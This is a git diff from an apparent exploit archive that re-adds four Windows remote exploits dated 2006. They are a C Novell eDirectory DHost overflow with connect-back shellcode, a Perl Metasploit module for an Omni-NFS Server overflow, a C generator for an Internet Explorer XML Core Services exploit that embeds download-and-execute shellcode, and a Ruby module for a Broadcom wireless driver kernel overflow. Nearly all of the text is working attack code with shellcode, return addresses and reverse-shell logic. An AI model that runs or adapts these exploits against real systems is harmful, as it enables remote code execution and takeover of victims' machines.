+  printf("\\  \\/  /  /_\\  \\ /    \\  _(__  <   ______ |  |  \\  /   |  |__/ ___\\|  |/ / \n");
+  printf(" >    <\\  \\_/   \\   |  \\/       \\ /_____/ |   Y  \\/    ^   /\\  \\___|    <  \n");
+  printf("/__/\\_ \\\\_____  /___|  /______  /         |___|  /\\____   |  \\___  >__|_ \\ \n");
+  printf("      \\/      \\/     \\/       \\/               \\/      |__|      \\/     \\/ \n\n");
+  printf("[i] Title:        \tNovell eDirectory DHost Buffer overflow\n");
+  printf("[i] Perl Code by:\tFistFuXXer\n");
+  printf("[i] Exploit by:   \tExpanders\n\n");
+  return 0;
+}
+
+int usage(char *filename) {
+  int i;
+  printf("Usage: \t%s     \n\n",filename);
+  printf("       \t   : Victim's host\n");
+  printf("       \t   : Victim's port  ::  Default: 8028\n");
+  printf("       \t   : Local ip address for connectback\n");
+  printf("       \t : Local port for connectback\n");
+  printf("       \t   : Target from the list below\n\n");
+  
+  printf("#   \t Platform\n");
+  printf("-----------------------------------------------\n");
+  for(i = 0; targets[i].platform; i++)
+        printf("%d \t %s\n",i,targets[i].platform);
+  printf("-----------------------------------------------\n");
+  exit(0);
+}
+
+int inject(char *port, char *ip)
+{
+    unsigned long xorip;
+    unsigned short xorport;
+    xorip = inet_addr(ip)^(unsigned long)0x6F88613F;
+    xorport = htons(atoi( port ))^(unsigned short)0x6F88;
+    memcpy ( &shellcode[184], &xorip, 4);
+    memcpy ( &shellcode[190], &xorport, 2);
+    return 0;
+}
+
+int remote_connect( char* ip, unsigned short port )
+{
+  int s;
+  struct sockaddr_in remote_addr;
+  struct hostent* host_addr;
+
+  memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
+  if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
+  {
+   printf ( "[X] Cannot resolve \"%s\"\n", ip );
+   exit ( 1 );
+  }
+  remote_addr.sin_family = AF_INET;
+  remote_addr.sin_port = htons ( port );
+  remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
+  if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
+  {
+   printf ( "[X] Socket failed!\n" );
+   exit ( 1 );
+  }
+  if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
+  {
+   printf ( "[X] Failed connecting!\n" );
+   exit ( 1 );
+  }
+  return ( s );
+}
+
+int main(int argc, char *argv[]) {
+    int s,position;
+    unsigned int rcv;
+    char *buffer,*request;
+    char recvbuf[256];
+    banner();
+    if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
+        usage(argv[0]);
+    position = 0;
+    printf("[+] Creating evil buffer\n");
+    buffer = (char *) malloc(BUFFSIZE);
+    request = (char *) malloc(BUFFSIZE + strlen(attack)); //  +3 == \r + \n + 0x00
+    memset(buffer,0x90,BUFFSIZE);  // Fill with nops
+
+    inject(argv[4],argv[3]);     // Xor port and ip and put them into the shellcode
+    memset(buffer,0x41,68);      // First comes the ascii
+    position = 68;
+    memcpy(buffer+position,DEADRET,4);
+    position = 680 - (strlen(shellcode) + 100);   // 680 : Pointer to next Execption structure
+    memcpy(buffer+position,shellcode,strlen(shellcode));
+    position += strlen(shellcode)+100;
+    memcpy(buffer+position,jmpover,4); position += 4;
+    memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
+    position += 8; // 8 bytes more nops
+    memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
+    position += 8; // 8 bytes more nops
+    memset(buffer+position,0x00,1); // End
+
+
+    sprintf(request,attack,buffer);
+    printf("[+] Connecting to remote host\n");
+    s = remote_connect(argv[1],atoi(argv[2]));
+    sleep(1);
+    printf("[+] Sending %d bytes of painfull buffer\n",strlen(buffer));
+    if ( send ( s, request, strlen (request), 0) <= 0 )
+    {
+           printf("[X] Failed to send buffer\n");
+           exit ( 1 );
+    }
+    printf("[+] Done - Wait for shell on port %s\n",argv[4]);
+    close(s);
+    free(buffer);
+    buffer = NULL;
+    return 0;
+}
+
+// milw0rm.com [2006-10-30]
diff --git a/platforms/windows/remote/2729.pm b/platforms/windows/remote/2729.pm
index e8e913b01..5f218ca6e 100755
--- a/platforms/windows/remote/2729.pm
+++ b/platforms/windows/remote/2729.pm
@@ -1,141 +1,141 @@
-# vd_xlink.pm
-#
-# The exploit is a part of VulnDisco Pack - use only under the license agreement
-# specified in LICENSE.txt in your VulnDisco distribution
-
-# VULNDISCO LICENSE
-
-# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to use it under the terms of the following License.
-
-# The Pack with all the data and software contained in it is the private property of GLEG ltd. Company ("the Company"). The Company is the only entity who has exclusive rights to the Pack. The Pack with all the software and data containing in it is the intellectual property of the Company and is guarded by intellectual property laws.
-
-# Purchaser has the rights to use the Pack only under the terms and conditions of this License to the maximum extent permitted by applicable law.
-# Purchaser has the rights to use the Pack only for his own needs or for the needs of his company if the License is purchased by the company. For the means of this License by purchaser's company those people are meant who directly works for the company which owns the License.
-# Purchaser is granted nonexclusive, non-transferable rights to use the Pack.
-
-# Purchaser is allowed to install the Pack on unlimited number of seats.
-
-# Purchaser is not restricted to use the Pack to test the particular IP range.
-
-# Purchaser is not allowed to disclose the Pack in whole or partly, to disclose any information concerning the Pack or any information derived from the Pack. Purchaser is not allowed to transfer the Pack or any data concerning it (including derived data), anyhow or by any means to third party entities. Purchaser is not allowed to sell or redistribute or otherwise transfer the rights to the Pack unless otherwise is expressly stated in writing by the Company.
-
-# Purchaser realizes that the Pack is provided as-is without warranty of any kind, including warranties that the Pack suits particular needs, is safe to use, or contain no issues. 
-
-# Purchaser realizes that the Pack contains potentially dangerous information which being improper used or misused can cause damage to Purchaser or to Purchaser's company or to third party organizations and individuals. 
-
-# The Company is not responsible for any losses to purchaser or to purchaser's company resulted from Purchaser's proper or improper use or inability to use the Pack, including but not limited to loss of information, damages to computers or to network infrastructure. The Company is not responsible for any losses to any third party organizations or individuals resulted from Purchaser's intentional or accidental use or misuse of the Pack. The Company is not responsible for any consequences of Purchaser's disclosure of the Pack. 
-
-# Purchaser realizes that he is solely responsible for any claims resulted from Purchaser's acquisition, use or misuse of the Pack and agrees to defend Company from mentioned claims at own cost. 
-
-# Purchaser agrees to take all necessary measures to not allow disclosure of the Pack, to use it only under the terms of this License and applicable law. Purchaser has been informed and agrees that in case of Purchaser.s breach of any provisions of this License the Company has right to take appropriate measures including legal prosecution.
-
-# All information that is provided for Purchaser by the Company, including Pack updates and support information, is provided under the same terms as in the Pack License. As for newer versions of the Pack, the Company reserves the right to issue new License with them.
-
-# This License is designed in accordance with the laws of Russian Federation.
-# License terms are governed by the laws of Russian Federation. Unless otherwise is agreed in writing, all disputes relating to this License shall be subject to final and binding arbitration in Russia, Moscow.
-
-# Purchaser has been informed and agrees that after installation of the Pack this Agreement is considered as signed and came into force as Agreement between the Company and Purchaser.
-
-# Purchaser has read and understood this License, and agrees to its terms and conditions.
-
-use strict;
-
-package Msf::Exploit::vd_xlink;
-use base "Msf::Exploit";
-use Pex::Text;
-
-my $advanced = { };
-
-my $info = 
-{
-	"Name"      => "[0day] Omni-NFS Server overflow",
-    	"Version"   => "\$Revision: 1.0 \$",
-    	"Authors"   => ["Evgeny Legerov"],
-    	"Arch"      => ["x86"],
-    	"OS"        => ["win32"],
-    	"Priv"      => 1,
-    	"UserOpts"  =>
-                {
-                	"RHOST" => [1, "ADDR", "The target address"],
-                    	"RPORT" => [1, "PORT", "The target port", 2049],
-                },
-
-    	"Description" => Pex::Text::Freeform(q{
-			Exploit for Omni-NFS Server stack overflow vulnerability.
-		}),
-
-
-   	"Payload" =>
-        	{
-                "Space"     => 427,
-          	},
-
-        "DefaultTarget"  => 0,
-        "Targets"        =>
-         	[
-        		["Omni-NFS Server 5.2 (nfsd.exe: call ebx) / Windows 2000 SP4", 0x00401843]
-
-         	],
-
-        "Keys"           => ["vd_xlink"],
-};
-
-sub new	{
-	my $class = shift;
-	return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);
-}
-
-sub Exploit {
-	my $self = shift;
-        my $host = $self->GetVar("RHOST");
-        my $port = $self->GetVar("RPORT");
-	my $writedir = $self->GetVar("DIR");
-	my $bind_port = $self->GetVar("LPORT");
-	my $target = $self->Targets->[$self->GetVar("TARGET")];
-	my $encodedPayload = $self->GetVar("EncodedPayload");
-        my $shellcode   = $encodedPayload->Payload;
-
-     	my $payload = "";
-        $payload .= "\x4d" x 9;
-        $payload .= $shellcode;
-        $payload .= "\x4d" x (427 - length($shellcode));
-        $payload .= "\x4d\x4d\x4d\x2d";
-        $payload .= pack("V", $target->[1]);
-        $payload .= "\xe9\x17\xfb\xff\xff"; # jmp $-1257
-        $payload .= "\x45" x 351;
-
-        my $s = "";
-        $s .= pack("N", 1);
-        $s .= pack("N", 0);
-        $s .= pack("N", 2);
-        $s .= pack("N", 100005);
-        $s .= pack("N", 1);
-        $s .= pack("N", 1);
-
-        $s .= pack("N", 1);
-        $s .= pack("N", 400);
-        $s .= substr($payload, 0, 400);
-
-        $s .= pack("N", 1);
-        $s .= pack("N", 400);
-        $s .= substr($payload, 400);
-
-                
-	my $req = pack("N", length($s) | 0x80000000) . $s;
-
-  	my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort"  => $port);
-        if ($sock->IsError) {
-                $self->PrintLine("Error creating socket: " . $sock->GetError);
-                return;
-        }
-
-	$sock->Send($req);
-	
-	sleep(3);
-
-	$sock->Close();
-}
-
-__END__
-
-# milw0rm.com [2006-11-06]
+# vd_xlink.pm
+#
+# The exploit is a part of VulnDisco Pack - use only under the license agreement
+# specified in LICENSE.txt in your VulnDisco distribution
+
+# VULNDISCO LICENSE
+
+# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to use it under the terms of the following License.
+
+# The Pack with all the data and software contained in it is the private property of GLEG ltd. Company ("the Company"). The Company is the only entity who has exclusive rights to the Pack. The Pack with all the software and data containing in it is the intellectual property of the Company and is guarded by intellectual property laws.
+
+# Purchaser has the rights to use the Pack only under the terms and conditions of this License to the maximum extent permitted by applicable law.
+# Purchaser has the rights to use the Pack only for his own needs or for the needs of his company if the License is purchased by the company. For the means of this License by purchaser's company those people are meant who directly works for the company which owns the License.
+# Purchaser is granted nonexclusive, non-transferable rights to use the Pack.
+
+# Purchaser is allowed to install the Pack on unlimited number of seats.
+
+# Purchaser is not restricted to use the Pack to test the particular IP range.
+
+# Purchaser is not allowed to disclose the Pack in whole or partly, to disclose any information concerning the Pack or any information derived from the Pack. Purchaser is not allowed to transfer the Pack or any data concerning it (including derived data), anyhow or by any means to third party entities. Purchaser is not allowed to sell or redistribute or otherwise transfer the rights to the Pack unless otherwise is expressly stated in writing by the Company.
+
+# Purchaser realizes that the Pack is provided as-is without warranty of any kind, including warranties that the Pack suits particular needs, is safe to use, or contain no issues. 
+
+# Purchaser realizes that the Pack contains potentially dangerous information which being improper used or misused can cause damage to Purchaser or to Purchaser's company or to third party organizations and individuals. 
+
+# The Company is not responsible for any losses to purchaser or to purchaser's company resulted from Purchaser's proper or improper use or inability to use the Pack, including but not limited to loss of information, damages to computers or to network infrastructure. The Company is not responsible for any losses to any third party organizations or individuals resulted from Purchaser's intentional or accidental use or misuse of the Pack. The Company is not responsible for any consequences of Purchaser's disclosure of the Pack. 
+
+# Purchaser realizes that he is solely responsible for any claims resulted from Purchaser's acquisition, use or misuse of the Pack and agrees to defend Company from mentioned claims at own cost. 
+
+# Purchaser agrees to take all necessary measures to not allow disclosure of the Pack, to use it only under the terms of this License and applicable law. Purchaser has been informed and agrees that in case of Purchaser.s breach of any provisions of this License the Company has right to take appropriate measures including legal prosecution.
+
+# All information that is provided for Purchaser by the Company, including Pack updates and support information, is provided under the same terms as in the Pack License. As for newer versions of the Pack, the Company reserves the right to issue new License with them.
+
+# This License is designed in accordance with the laws of Russian Federation.
+# License terms are governed by the laws of Russian Federation. Unless otherwise is agreed in writing, all disputes relating to this License shall be subject to final and binding arbitration in Russia, Moscow.
+
+# Purchaser has been informed and agrees that after installation of the Pack this Agreement is considered as signed and came into force as Agreement between the Company and Purchaser.
+
+# Purchaser has read and understood this License, and agrees to its terms and conditions.
+
+use strict;
+
+package Msf::Exploit::vd_xlink;
+use base "Msf::Exploit";
+use Pex::Text;
+
+my $advanced = { };
+
+my $info = 
+{
+	"Name"      => "[0day] Omni-NFS Server overflow",
+    	"Version"   => "\$Revision: 1.0 \$",
+    	"Authors"   => ["Evgeny Legerov"],
+    	"Arch"      => ["x86"],
+    	"OS"        => ["win32"],
+    	"Priv"      => 1,
+    	"UserOpts"  =>
+                {
+                	"RHOST" => [1, "ADDR", "The target address"],
+                    	"RPORT" => [1, "PORT", "The target port", 2049],
+                },
+
+    	"Description" => Pex::Text::Freeform(q{
+			Exploit for Omni-NFS Server stack overflow vulnerability.
+		}),
+
+
+   	"Payload" =>
+        	{
+                "Space"     => 427,
+          	},
+
+        "DefaultTarget"  => 0,
+        "Targets"        =>
+         	[
+        		["Omni-NFS Server 5.2 (nfsd.exe: call ebx) / Windows 2000 SP4", 0x00401843]
+
+         	],
+
+        "Keys"           => ["vd_xlink"],
+};
+
+sub new	{
+	my $class = shift;
+	return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);
+}
+
+sub Exploit {
+	my $self = shift;
+        my $host = $self->GetVar("RHOST");
+        my $port = $self->GetVar("RPORT");
+	my $writedir = $self->GetVar("DIR");
+	my $bind_port = $self->GetVar("LPORT");
+	my $target = $self->Targets->[$self->GetVar("TARGET")];
+	my $encodedPayload = $self->GetVar("EncodedPayload");
+        my $shellcode   = $encodedPayload->Payload;
+
+     	my $payload = "";
+        $payload .= "\x4d" x 9;
+        $payload .= $shellcode;
+        $payload .= "\x4d" x (427 - length($shellcode));
+        $payload .= "\x4d\x4d\x4d\x2d";
+        $payload .= pack("V", $target->[1]);
+        $payload .= "\xe9\x17\xfb\xff\xff"; # jmp $-1257
+        $payload .= "\x45" x 351;
+
+        my $s = "";
+        $s .= pack("N", 1);
+        $s .= pack("N", 0);
+        $s .= pack("N", 2);
+        $s .= pack("N", 100005);
+        $s .= pack("N", 1);
+        $s .= pack("N", 1);
+
+        $s .= pack("N", 1);
+        $s .= pack("N", 400);
+        $s .= substr($payload, 0, 400);
+
+        $s .= pack("N", 1);
+        $s .= pack("N", 400);
+        $s .= substr($payload, 400);
+
+                
+	my $req = pack("N", length($s) | 0x80000000) . $s;
+
+  	my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort"  => $port);
+        if ($sock->IsError) {
+                $self->PrintLine("Error creating socket: " . $sock->GetError);
+                return;
+        }
+
+	$sock->Send($req);
+	
+	sleep(3);
+
+	$sock->Close();
+}
+
+__END__
+
+# milw0rm.com [2006-11-06]
diff --git a/platforms/windows/remote/2743.html b/platforms/windows/remote/2743.html
index c4e266987..6187816f3 100755
--- a/platforms/windows/remote/2743.html
+++ b/platforms/windows/remote/2743.html
@@ -1,68 +1,68 @@
-
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-11-08]
+
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-11-08]
diff --git a/platforms/windows/remote/2749.html b/platforms/windows/remote/2749.html
index 0c3b09e0f..fb8fe2567 100755
--- a/platforms/windows/remote/2749.html
+++ b/platforms/windows/remote/2749.html
@@ -1,71 +1,71 @@
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-11-10]
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-11-10]
diff --git a/platforms/windows/remote/2753.c b/platforms/windows/remote/2753.c
index 762dbd8e6..7d7ba9ffb 100755
--- a/platforms/windows/remote/2753.c
+++ b/platforms/windows/remote/2753.c
@@ -1,183 +1,183 @@
-/*
-*-----------------------------------------------------------------------
-*
-* MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit
-*	Works on  Windows XP versions including SP2 and 2K 
-*
-* Author: M03
-*
-*	Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), 
-*   Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
-*          :
-* Tested   : 
-*          : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
-*          :
-*          :
-*          :
-*          :
-*          :Usage: filename  [htmlfile]
-*          :       filename.exe http://site.com/file.exe localhtml.htm      
-*          
-*------------------------------------------------------------------------
-*/
-
-#include 
-#include 
-#include 
-
-FILE *fp = NULL;
-char *file = "MicroHack.htm";
-char *url = NULL;
-
-unsigned char sc[] =     
-"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
-
-char * header =
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n"
-"\n";
-
-// print unicode shellcode
-void PrintPayLoad(char *lpBuff, int buffsize)
-{
-   int i;
-   for(i=0;i [Local htmlfile]\r\n\n", argv[0]);
-      exit(1);
-   }
-   
-   url = argv[1];
-   
-
-    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
-    {
-        printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
-        return;                
-    }
-
-      printf("[+] download url:%s\n", url);
-      
-      if(argc >=3) file = argv[2];
-      printf("[+] exploit file:%s\n", file);
-       
-   fp = fopen(file, "w");
-   if(!fp)
-   {
-       printf("[-] Open file error!\n");
-          return;
-   }    
-   
-   fprintf(fp, "%s", header);
-   fflush(fp);
-   
-   memset(buf, 0, sizeof(buf));
-   sc_len = sizeof(sc)-1;
-   memcpy(buf, sc, sc_len);
-   memcpy(buf+sc_len, url, strlen(url));
-   
-   sc_len += strlen(url)+1;
-   PrintPayLoad(buf, sc_len);
- 
-   fprintf(fp, "%s", footer);
-   fflush(fp);  
-   
-   printf("[+] exploit write to %s success!\n", file);
-}
-
-// Reverse Microsoft IE 9/11 Exploit
-
-// milw0rm.com [2006-11-10]
+/*
+*-----------------------------------------------------------------------
+*
+* MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit
+*	Works on  Windows XP versions including SP2 and 2K 
+*
+* Author: M03
+*
+*	Credit: metasploit, jamikazu, yag kohna(for the shellcode), LukeHack (for the code), 
+*   Greetz: to PimpinOYeah Subbart n0limit MpR c0rrupt raze
+*          :
+* Tested   : 
+*          : Windows XP SP2 + Internet Explorer 6.0, XP SP1, 2KServer
+*          :
+*          :
+*          :
+*          :
+*          :Usage: filename  [htmlfile]
+*          :       filename.exe http://site.com/file.exe localhtml.htm      
+*          
+*------------------------------------------------------------------------
+*/
+
+#include 
+#include 
+#include 
+
+FILE *fp = NULL;
+char *file = "MicroHack.htm";
+char *url = NULL;
+
+unsigned char sc[] =     
+"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
+
+char * header =
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n"
+"\n";
+
+// print unicode shellcode
+void PrintPayLoad(char *lpBuff, int buffsize)
+{
+   int i;
+   for(i=0;i [Local htmlfile]\r\n\n", argv[0]);
+      exit(1);
+   }
+   
+   url = argv[1];
+   
+
+    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
+    {
+        printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
+        return;                
+    }
+
+      printf("[+] download url:%s\n", url);
+      
+      if(argc >=3) file = argv[2];
+      printf("[+] exploit file:%s\n", file);
+       
+   fp = fopen(file, "w");
+   if(!fp)
+   {
+       printf("[-] Open file error!\n");
+          return;
+   }    
+   
+   fprintf(fp, "%s", header);
+   fflush(fp);
+   
+   memset(buf, 0, sizeof(buf));
+   sc_len = sizeof(sc)-1;
+   memcpy(buf, sc, sc_len);
+   memcpy(buf+sc_len, url, strlen(url));
+   
+   sc_len += strlen(url)+1;
+   PrintPayLoad(buf, sc_len);
+ 
+   fprintf(fp, "%s", footer);
+   fflush(fp);  
+   
+   printf("[+] exploit write to %s success!\n", file);
+}
+
+// Reverse Microsoft IE 9/11 Exploit
+
+// milw0rm.com [2006-11-10]
diff --git a/platforms/windows/remote/2770.rb b/platforms/windows/remote/2770.rb
index 452f7896b..733d3d7de 100755
--- a/platforms/windows/remote/2770.rb
+++ b/platforms/windows/remote/2770.rb
@@ -1,200 +1,200 @@
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
-
-	include Exploit::Lorcon
-	include Exploit::KernelMode	
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'Broadcom Wireless Driver Probe Response SSID Overflow',
-			'Description'    => %q{
-				This module exploits a stack overflow in the Broadcom Wireless driver
-			that allows remote code execution in kernel mode by sending a 802.11 probe
-			response that contains a long SSID. The target MAC address must
-			be provided to use this exploit. The two cards tested fell into the
-			00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
-
-			This module depends on the Lorcon library and only works on the Linux platform
-			with a supported wireless card. Please see the Ruby Lorcon documentation 
-			(external/ruby-lorcon/README) for more information.			
-			},
-			
-			'Authors'        => 
-				[
-					'Chris Eagle',	# initial discovery
-					'Johnny Cache ', # the man with the plan
-					'skape', # windows kernel ninjitsu and debugging
-					'hdm' # porting the C version to ruby
-				],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 3583 $',
-			'References'     =>
-				[
-					['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
-				],
-			'Privileged'     => true,
-						
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'thread',
-				},
-
-			'Payload'        =>
-				{
-					'Space'    => 500
-				},
-			'Platform'       => 'win',
-			'Targets'        => 
-				[
-					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
-					[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
-						{
-							'Ret'      => 0x8066662c, # jmp edi
-							'Platform' => 'win',
-							'Payload'  => 
-							{
-								'ExtendedOptions' => 
-								{
-									'Stager'       => 'sud_syscall_hook',
-									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
-									'Recovery'     => 'idlethread_restart',
-									'KiIdleLoopAddress' => 0x804dbb27,										
-										
-								}
-							}
-						} 
-					],
-					
-					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
-					[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
-						{
-							'Ret'      => 0x804f16eb, # jmp edi
-							'Platform' => 'win',
-							'Payload'  => 
-							{
-								'ExtendedOptions' => 
-								{
-									'Stager'       => 'sud_syscall_hook',
-									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
-									'Recovery'     => 'idlethread_restart',
-									'KiIdleLoopAddress' => 0x804dc0c7,
-								}
-							}
-						} 
-					]					
-				],
-
-			'DefaultTarget' => 0
-			))
-			
-		register_options(
-			[
-				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
-				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
-			], self.class)
-	end
-
-	def exploit
-		open_wifi
-		
-		stime = Time.now.to_i
-		
-		print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
-		
-		while (stime + datastore['RUNTIME'].to_i > Time.now.to_i) 
-			
-			select(nil, nil, nil, 0.02)
-			wifi.write(create_response)
-
-			select(nil, nil, nil, 0.01)
-			wifi.write(create_beacon)
-			
-			break if session_created?
-			
-		end
-		
-		print_status("Finished sending frames...")
-	end
-	
-	def create_beacon
-		src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
-		dst = eton('FF:FF:FF:FF:FF:FF')
-		seq = [Time.now.to_i % 4096].pack('n')
-	
-		blob = create_frame
-		blob[0,1] = 0x80.chr
-		blob[4,6] = dst
-		blob[10,6] = src
-		blob[16,6] = src
-		blob[22,2] = seq
-		
-		blob
-	end
-	
-	def create_response
-		src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
-		dst = eton(datastore['ADDR_DST'])
-		seq = [Time.now.to_i % 256].pack('n')
-	
-		blob = create_frame
-		blob[0,1] = 0x50.chr		
-		blob[4,6] = dst
-		blob[10,6] = src
-		blob[16,6] = src # bssid field, good idea to set to src. 
-		blob[22,2] = seq
-		
-		blob
-	end
-
-	def create_frame
-		"\x80" +                      # type/subtype
-		"\x00" +                      # flags
-		"\x00\x00" +                  # duration  
-		"\xff\xff\xff\xff\xff\xff" +  # dst
-		"\x58\x58\x58\x58\x58\x58" +  # src
-		"\x58\x58\x58\x58\x58\x58" +  # bssid
-		"\x70\xed" +                  # sequence number
-		
-		#
-		# fixed parameters
-		#
-		
-		# timestamp value
-		Rex::Text.rand_text_alphanumeric(8) + 
-		"\x64\x00" +                  # beacon interval
-		"\x11\x04" +                  # capability flags
-		
-		#
-		# tagged parameters
-		#
-		
-		# ssid tag
-		"\x00" + # tag: SSID parameter set
-		"\x5d" + # len: length is 93 bytes
-		
-		# jump into the payload
-		"\x89\xf9" +                 # mov edi, ecx
-		"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
-		"\xff\xe1" +                 # jmp ecx
-		
-		# padding
-		Rex::Text.rand_text_alphanumeric(79) + 
-		
-		# return address
-		[target.ret].pack('V') +
-		
-		# vendor specific tag
-		"\xdd" + # wpa
-		"\xff" + # big as we can make it
-		
-		# the kernel-mode stager
-		payload.encoded
-	end
-	
-end
-end
-
-# milw0rm.com [2006-11-13]
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
+
+	include Exploit::Lorcon
+	include Exploit::KernelMode	
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Broadcom Wireless Driver Probe Response SSID Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in the Broadcom Wireless driver
+			that allows remote code execution in kernel mode by sending a 802.11 probe
+			response that contains a long SSID. The target MAC address must
+			be provided to use this exploit. The two cards tested fell into the
+			00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
+
+			This module depends on the Lorcon library and only works on the Linux platform
+			with a supported wireless card. Please see the Ruby Lorcon documentation 
+			(external/ruby-lorcon/README) for more information.			
+			},
+			
+			'Authors'        => 
+				[
+					'Chris Eagle',	# initial discovery
+					'Johnny Cache ', # the man with the plan
+					'skape', # windows kernel ninjitsu and debugging
+					'hdm' # porting the C version to ruby
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 3583 $',
+			'References'     =>
+				[
+					['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
+				],
+			'Privileged'     => true,
+						
